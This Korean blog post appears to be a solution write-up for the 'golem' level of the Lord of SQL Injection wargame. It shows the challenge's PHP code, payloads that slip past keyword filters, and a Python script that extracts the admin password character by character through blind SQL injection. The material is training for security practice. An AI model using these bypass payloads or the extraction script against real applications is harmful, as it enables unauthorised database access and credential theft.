반응형
GOLEM
문제 코드:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
highlight_file(__FILE__);
?>
|
cs |
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
pw을 비교하기 때문에 blind sqli로 pw을 구해내야 한다.
그러나
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");
로 인해서 or, and, substr(, = 을 사용할 수 없게 됐다. 대신 우회하여 사용해야 한다.
우회 방법은 아래와 같다.
or => ||
and => && (%26%26)
substr() => mid()
= => like
pw 길이 구하기
pw = 1' || '1'like'1' %26%26 length(pw) like 8%23
길이는 8이다. (이때까지 8이었으니 8로 때려 맞추면 된다.)
풀이 코드:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
import urllib
import urllib2
import sys
import time
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
key = ""
for i in range(8):
for j in range(len(string)):
#payload = "1' || '1'='1' &&(substring(pw,"+str(i+1)+",1)='"+string[j]+"')#"
payload = "1' || '1'like'1' &&(mid(pw,"+str(i+1)+",1) like '"+string[j]+"')#"
payload = urllib.quote(payload)
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw="+payload
print url
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
request.add_header('Cookie', 'PHPSESSID=your_cookie_value_here')
request.get_method = lambda:'GET'
data = opener.open(request)
data = data.read()
if "Hello admin" in data:
key += string[j]
print "[*] Find Password!! Password is ["+key+"]"
break
else:
print "[-] Fail!"
time.sleep(0.1)
|
cs |
반응형
'WAR GAME > Lord of SQLi' 카테고리의 다른 글
| LORD OF SQL INJECTION [bugbear] 풀이 (0) | 2019.11.04 |
|---|---|
| LORD OF SQL INJECTION [darkknight] 풀이 (0) | 2019.11.02 |
| LORD OF SQL INJECTION [SKELETON] 풀이 (0) | 2019.10.31 |
| LORD OF SQL INJECTION [VAMPIRE] 풀이 (0) | 2019.10.30 |
| LORD OF SQL INJECTION [troll] 풀이 (0) | 2019.10.29 |